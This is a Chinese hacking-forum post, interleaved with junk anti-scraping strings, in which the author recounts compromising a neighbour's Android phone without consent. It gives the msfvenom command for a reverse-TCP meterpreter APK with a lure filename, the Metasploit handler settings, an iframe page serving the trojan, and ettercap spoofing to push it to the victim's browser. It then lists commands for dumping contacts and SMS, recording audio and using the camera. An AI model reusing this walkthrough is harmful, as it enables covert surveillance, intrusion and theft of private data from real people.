找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 1982|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; @5 H. b; F1 C+ @ 五、msf+ettercap入侵邻居安卓手机 + B9 b8 B# W1 r% N" b% z2 L

1 A& {2 n! F% {

0 z3 o9 P: [% l 首先启动msf # z) V" F. X$ m5 z$ ?$ r

3 q+ m1 z9 H3 U) b6 X# Q' a

% v. w: e# b* {2 ^- l 先用kali生成一个安卓木马,如下命令: - h1 H+ ^1 c+ x3 c% h* k8 n

9 r% d, v& j7 P# r2 l0 d0 _) l

7 i K) d Z1 W7 h Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 6 W: e; U* I) S4 v3 v5 h+ I

1 g" I* S$ z) e! _2 @5 W3 q

$ Y8 r9 E2 p% m 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 # l) g- ^ D7 v* d9 @1 k3 k6 H

. I# ~! y( i. R4 I

1 m! S4 \1 `: C; i: | 然后进入msf 6 Y+ e$ f6 ]" P4 H- q

# d5 x q( @) D$ e2 B

1 F2 [7 a4 k' N3 y: c use exploit/multi/handler W6 B( `% }: u, q2 q

4 t) O- x0 S. q+ r' q$ M

2 Y9 T ~: v6 [$ L$ k set payload android/meterpreter/reverse_tcp , o J3 O- A7 k% p' N6 H+ V

/ n, j4 Y7 {9 f ], G" j

! f9 [5 E' k/ F9 U) E& J set LHOST 192.168.0.109 //ipkailiip ) r; I' ~& Y" P! D8 V# k

9 u4 P' J' ]6 _

: \8 p6 Y9 p9 ]2 I% D% |3 r; x1 `0 a set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ; Y8 W/ p) g4 i, ?

3 y% `) S, V# t/ o4 H+ ~/ \3 D% E

" n+ b/ n2 q: j( J5 B. y7 N Exploit ?$ b5 |3 b& y; k5 ]/ Z" _" l, c

5 V& X* v' \8 C6 w. I+ G

1 z+ M' b# d* ?3 B8 O: Z   . Q V4 z5 ]" K d+ P

; K! a- d) {4 ?

0 O2 q9 o, j6 v, B) { 下面我们开启ettercap -G * B" ~1 M6 `* ^8 ^, w" U

7 b) Z1 Q9 j8 F

, t/ _% g1 n% ~% n8 V 我物理IP ' W" _, Q% j9 Q; w) K

# b; v$ s9 P& z( M1 P/ T% u

. A4 I7 o! i' d% ~" z   % k7 K+ _8 ^/ D* D) n

7 O+ K# S2 H7 {. K

5 B8 n+ Q4 U* u4 i; I5 }& W) V 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 8 W C6 q7 ?/ t* N7 i9 ~/ R

) v( C0 M; w" b6 H! L. T

6 N0 s8 P" Z4 W1 D; _ 下面我们来设置一下 * ]! W$ o! c0 k! j

/ E( b% y% a% g

# S$ p9 p! \2 [' A6 K   & Q* [8 L* n& _) ~

. H( w1 L7 p+ z' R6 Y# p& ^5 ?, ~

9 N f8 O N. d* p' M+ {0 V& G$ r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, # ?5 ^) ?, [5 F4 F- g9 P

V+ ^' T/ e3 Y- ~' o$ H( ^% T/ \4 \

! N# ~4 Y- }3 [2 ^ r$ o   % h( C6 D/ Y* V- c% ~# N* N

1 Y% y+ x! a1 F Z7 y

6 z/ ~. { z! P( L. W% E   . @+ }- F9 Q5 Z6 M% g

) T, d1 B/ A# S7 b% N, @4 ?6 `8 t; l

z, \# Q6 S# s7 }* g. m2 J   % J: K; b/ l4 v# T3 Z. ?

3 o- \* n' r4 Z

4 g& y" F" }# k/ y$ L" J& _% Q6 V   4 Q+ v- E7 a2 N. P8 d7 Q

" {8 M. g% O9 F! K1 U! K: o T

A8 M( I$ [3 y   2 c2 q% g+ h7 Y5 Y

' k" r# ?* e9 ?- G

5 U3 r$ b7 T; k! L   " t; H/ t( P; d: a' ~; |% U5 f

0 p$ ?, b4 \4 L, M5 B

6 V0 m8 A0 L# o6 r0 |' F6 Q   / D4 j6 s6 j7 W z' c! P B

4 q5 [- T# i% C4 ?3 ]7 u

) u/ B" z* K- U, G, f   X+ Y9 D8 M* z& v3 N; j

& M; G0 P1 ^6 f3 |' o2 t7 A

; D7 R- o) R2 \0 P6 j* p   3 I3 C; D$ I) Y* i+ C

! Q1 l8 k: c8 d+ D

7 B: |! a8 ]2 ~% ^. y4 x$ v1 ^   7 X' v% |% C7 d+ n5 X1 c U. n/ |

* ~! r) \' b4 J, S% G( Q9 f

9 f# }, U/ k" _4 _4 P   , V( a$ L4 N/ u5 `( T

0 W7 p9 H1 X) x/ K

# J L5 H+ n+ E   ) T7 h5 z& R7 ~7 ~( X1 ~

4 Q. \6 m: R! p! l! k

# K" q1 N( c- ^   % \( i4 Q. X. p

+ I* n: Q/ m# j; P) G6 ]1 J' Z

' J. k2 s( x# E# T7 P. q) s$ ? 下面我们开始攻击 ; n! O4 W$ i q$ Z3 y6 U6 M

( U4 h0 E9 j6 ~: Y1 K/ ^

0 c+ s0 j; J& G( W   7 A/ D7 M4 u9 i7 i' l- k

/ \; O, F- _+ Q# `" i Z2 {

3 l) B* a+ Y2 ^# j& i7 Y   7 Q& [; w/ y* j) Q

% k1 z3 X2 |0 y

! A; F# z9 }" {% e) |3 i4 F   , w3 z0 [# U" }4 o2 j6 m

1 K( \) M; H) l# ?% }+ t" q

! b+ ]. X% t7 v. J2 R   / u" Z0 ]) x- `

4 P/ i1 s% X6 G+ d& _

7 x/ a: B1 u. J2 H: c2 W   , K$ U: S7 Q3 |) [

0 n8 Z" p) n( [5 u" g6 k

* _. d1 b' Z, R ]- W9 F, ^ 大概过了5分钟多,发现反弹成功了 1 D) n: y5 ~+ L+ F: e! E8 q& y2 S

. k& `" T( |2 z1 v8 g5 F

; u2 H# a- ?1 z) p+ h" q   2 @9 C0 }( V) F9 l; D2 g

; B; P5 T" T* Y# ]* p' [

& d) w p& i2 L# k1 S   1 k" i$ G. S! T6 D* Z

' b4 }+ d+ ?& F& |6 G3 M6 Z

8 m4 A, B! d' ?4 X7 U. |   5 v" N; Z y& l+ G$ p8 T

0 a% E3 n* j* Y0 \

0 I8 B* L, g6 O M/ y6 h   / q4 S! h3 i( B; V

' u' Z ]& c, r% k' B7 O

# W) z: Z- f: y7 j8 J   4 W; G* [2 [7 }# ] B9 k

4 X/ l, ~+ V; \9 I( ^: v6 w6 d: U

1 S7 {7 S8 ]3 L* R   : w a8 e( f6 \6 k5 q

& {& R7 `) Q$ Q' X7 b" H( V

+ d H8 ^* j0 V4 K5 Z$ O) ?. j+ A   , ?/ H- o) A" q3 N3 Y0 l5 o

- v! `! Y- _$ @, V( x2 n3 I

9 v* ]) V7 Q+ w* R, X 执行命令 " d+ r5 H7 P9 g9 b* E. K) W

3 M/ @9 G# g M' T* C1 b

. V! ?) y" W* a4 u) x   . m, G+ h, Z0 A0 H9 P7 Y) ?! L! {2 a

- c- l6 `* ~+ v; n1 w: Z. W

3 l# ]- `5 t8 ^8 s dump_contacts    --》这个是导出电话 : m. N8 {! j2 L+ Z

! k$ W2 F M/ V# R+ ]' i# H7 c

6 y& [! v4 I. ^ dump_sms --》这个是导出信息 7 L4 F* U! s* L

% F ]7 E6 l$ s- y1 w

8 o6 f& z- |( e5 W( t9 v* d s record_mic     Record audio from the default microphone for X seconds / I }: t, n, w8 ?0 X7 a3 J+ a: _: K Z

/ X8 m2 z# _0 n B5 i# _

/ G/ z9 }: S5 z7 W- Z     webcam_chat    Start a video chat 6 C. k! ]0 g1 {1 x- M! e- a

! b6 n! ]' p+ ?) r, f: T

: K `7 ^4 _& G" a( \* r {     webcam_list    List webcams : ^, {8 g: u& s" C, y

; \# s% L* @7 D; O2 Z, p

?5 l: d) M1 e1 l% M     webcam_snap    Take a snapshot from the specified webcam * |3 } D* t6 F- p8 P

l; Y2 R0 T3 e4 y" }

4 r) O4 F$ _7 K webcam_stream  lay a video stream from the specified webcam 9 b8 w1 U$ {# {

& |& ], j: ^& m7 P* W& S

! P; r% x6 |# k5 o7 _% f7 {. ~   6 N `) U4 P- I

- G# U& z- W9 o, V

: Q! @1 t; K( w   4 O! [+ c& @2 A7 b s1 E4 A% y

- q/ ?7 t! h: t9 ?3 C

% O: t1 K+ \/ A6 J# M( L 我们打开看一下电话薄, . q2 y. [# b+ D( K2 i# W- i

/ L3 h$ e0 L2 o+ K

+ I' o2 R: O, i   * z7 |0 K+ U4 ?4 z' n

6 c/ t8 x' D5 `) o

, ~" M- E3 P9 Q6 f3 D! s& d   1 D9 c+ m, e+ W3 Y' Q

. `/ w9 N4 k/ Q+ ?" D

4 d& V9 _- G/ Q   - ~* ^! R7 m: W1 |& u/ S

1 N$ O+ a8 `: m

( O" y, b: Q1 M0 d5 p4 g! Y" {   $ R8 \0 _* U6 o5 F% X) I. E

5 s; e7 p2 C4 _- J8 d& ?

( c: T* r6 K% d! C3 ?4 K   : w% n; V/ s) W& n

: p! T+ C; \& O: P

$ J# X! \1 t; R" F6 \& f6 f: x   , m% U) s2 ?& A! z7 w& {

7 {; r s: D$ m' B4 t

7 x6 U- A! F$ w" w0 v1 b 我们同时欺骗成DroidJack木马,使用方法如图: 3 [* _& ?0 B; o2 t8 [0 R4 C# A

2 I8 M, S5 a% V% M& Y/ |0 r8 q3 \

& Z. Y* j2 Q/ A   $ W7 M3 G+ U' D' M

+ f( P* U$ q) {

; [5 w% R) \* K# k, a   2 O0 B" I- g! J r& f

3 o1 ~; C- t8 A( w, p1 c

8 e3 M. |2 N( c+ h7 T( X& `   / {$ c, b* b7 u5 K& e9 p, v

2 G0 ~3 w. `7 J# x' F8 P

1 s* p6 E7 z: _& s6 Z* I, b 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 ?" z5 b7 u# ~; ~3 Q: e7 M8 \

1 h# ~$ o+ o; m, B7 i9 w0 Z2 k

0 B$ M& e+ j. A8 q   # r9 a+ P+ k6 v q5 x; s L% s

/ i2 n- m6 a- L2 p

8 o! H' m" Z4 f) M/ k   ; Z B# }7 U! o, J9 P. \) p, C

3 _ J8 E4 K, ]9 x

: ?+ v$ H( }9 r' D! W* r- a   . [4 @- f/ c1 w7 d, q

1 c. r5 o, K6 [) y5 \8 }4 ?$ ?

+ R- y) t' H4 g% ~' c( |2 _ 7 x: B# C5 T/ g; }( \% [

8 X, T l" d' e/ o: R

- `! s8 s. _; t1 x
- P& s' X o, m; p% |

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表